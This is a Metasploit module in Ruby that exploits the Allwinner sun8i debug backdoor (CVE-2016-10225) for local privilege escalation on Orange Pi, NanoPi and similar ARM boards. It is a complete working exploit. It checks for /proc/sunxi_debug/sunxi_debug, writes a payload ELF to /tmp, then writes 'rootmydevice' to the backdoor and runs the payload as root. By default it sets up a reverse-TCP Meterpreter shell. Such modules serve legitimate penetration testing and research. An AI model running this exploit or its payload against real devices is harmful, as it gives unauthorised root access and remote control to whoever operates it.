modules/exploits/multi/local/allwinner_backdoor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices.
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno.
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die <mike@stcyrsecurity.com>', # Module
'KotCzarny' # Discovery
],
'Platform' => [ 'android', 'linux' ],
'DisclosureDate' => '2016-04-30',
'DefaultOptions' => {
'payload' => 'linux/armle/meterpreter/reverse_tcp'
},
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'References' => [
[ 'CVE', '2016-10225' ],
[ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
[
'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
],
[ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
[ 'Auto', {} ]
],
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'DefaultTarget' => 0
)
)
end
def check
backdoor = '/proc/sunxi_debug/sunxi_debug'
if file_exist?(backdoor)
return CheckCode::Appears("#{backdoor} exists")
end
CheckCode::Safe("Backdoor #{backdoor} not found")
end
def exploit
backdoor = '/proc/sunxi_debug/sunxi_debug'
fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.") unless file_exist?(backdoor)
pl = generate_payload_exe
exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
vprint_good "Backdoor Found, writing payload to #{exe_file}"
write_file(exe_file, pl)
cmd_exec("chmod +x #{exe_file}")
vprint_good('Escalating')
cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
end
end